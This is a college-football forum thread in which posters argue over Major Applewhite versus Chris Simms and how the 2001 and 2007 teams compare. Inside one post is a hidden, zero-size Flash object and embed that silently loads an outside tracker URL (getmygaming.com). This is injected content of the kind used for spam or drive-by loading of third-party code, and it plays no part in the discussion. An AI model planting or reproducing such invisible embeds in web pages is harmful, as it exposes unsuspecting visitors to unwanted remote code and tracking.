Did Major Applewhite have every program in the country beating down his door? You aren't very good at this.
You know how train wrecks attract all the rubberneckers?<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://getmygaming.com/?tracker=4083"></param><param name="allowFullScreen" value="true"></param><embed src="http://getmygaming.com/?tracker=4083" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>
Same concept.
While I was proud of the 2007 team, you and everybody else knows that was one of the worst 10 win teams in the history of the program.
Somehow winning the East doesn't rise to the level of "one of the worst 10 win teams in the history of the program". Wake up.
The 11-2 2001 team was worse than the 10-3 2007 team. Why? #2 lost to a #21 in the SEC champ game and squandered what should have been 2 national titles in this decade.
Our history is that we don't win when we need to. We have a losing record in the SEC champ game. Hopefully our new coach can execute.

I would say that Applewhite had a much better college career than Simms. Simms' last name got him many places in his career. Applewhite is doing well in coaching, while Simms is still floundering around the NFL and will never be a great QB, IMO.
